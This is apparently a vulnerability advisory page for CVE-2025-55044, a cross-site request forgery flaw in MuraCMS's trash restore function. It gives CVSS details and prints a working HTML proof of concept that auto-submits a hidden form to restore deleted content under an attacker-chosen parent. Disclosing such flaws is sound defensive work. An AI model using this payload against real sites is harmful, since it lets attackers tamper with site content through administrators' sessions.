Security Vulnerability Report
CVE-2025-55044 CVSS 8.8 HIGH

CVE-2025-55044

Published: 2026-03-18 16:16:24
Last Modified: 2026-03-20 18:11:47

Description

The Trash Restore CSRF vulnerability in MuraCMS through 10.1.10 allows attackers to restore deleted content from the trash to unauthorized locations through CSRF. The vulnerable cTrash.restore function lacks CSRF token validation, enabling malicious websites to forge requests that restore content to arbitrary parent locations when an authenticated administrator visits a crafted webpage. Successful exploitation of the Trash Restore CSRF vulnerability results in unauthorized restoration of deleted content to potentially inappropriate or malicious locations within the MuraCMS website structure. When an authenticated administrator visits a malicious webpage containing the CSRF exploit, their browser automatically submits a hidden form that restores specified content from the trash to a location determined by the attacker through the parentid parameter. This can lead to restoration of previously deleted malicious content, placement of sensitive documents in public areas, manipulation of website navigation structure, or restoration of outdated content that was intentionally removed for security or compliance reasons.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector: Network; Attack Complexity: Low; Privileges Required: None; User Interaction: Required; Scope: Unchanged
Confidentiality Impact: High; Integrity Impact: High; Availability Impact: High
Exploitability Sub-score: 2.8; Impact Sub-score: 5.9

Configurations (Affected Products)

cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:* - VULNERABLE
MuraCMS < 10.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-55044 CSRF PoC for MuraCMS Trash Restore -->
<!-- Visit this page as an authenticated MuraCMS administrator -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF Exploit - CVE-2025-55044</title>
</head>
<body>
  <h1>CSRF Exploit for MuraCMS Trash Restore</h1>
  <p>This exploit will restore deleted content to an unauthorized location.</p>
  <form id="csrfForm" action="http://target-site.com/index.cfm/cTrash/restore/" method="POST" target="_blank">
    <!-- Set the content ID to restore -->
    <input type="hidden" name="contentID" value="VICTIM_CONTENT_ID">
    <!-- Set the target parent ID for restoration -->
    <input type="hidden" name="parentID" value="ATTACKER_CONTROLLED_LOCATION_ID">
    <!-- MuraCMS restore action -->
    <input type="hidden" name="method" value="restore">
  </form>
  <script>
    // Auto-submit the form when page loads
    document.getElementById('csrfForm').submit();
  </script>
  <p>Form submitted automatically. Check if content was restored.</p>
</body>
</html>

Weakness

CWE-352 (Cross-Site Request Forgery)

References

https://docs.murasoftware.com/v10/release-notes/ (Release Notes)
https://docs.murasoftware.com/v10/release-notes/#section-version-1014 (Release Notes)
https://www.murasoftware.com (Product)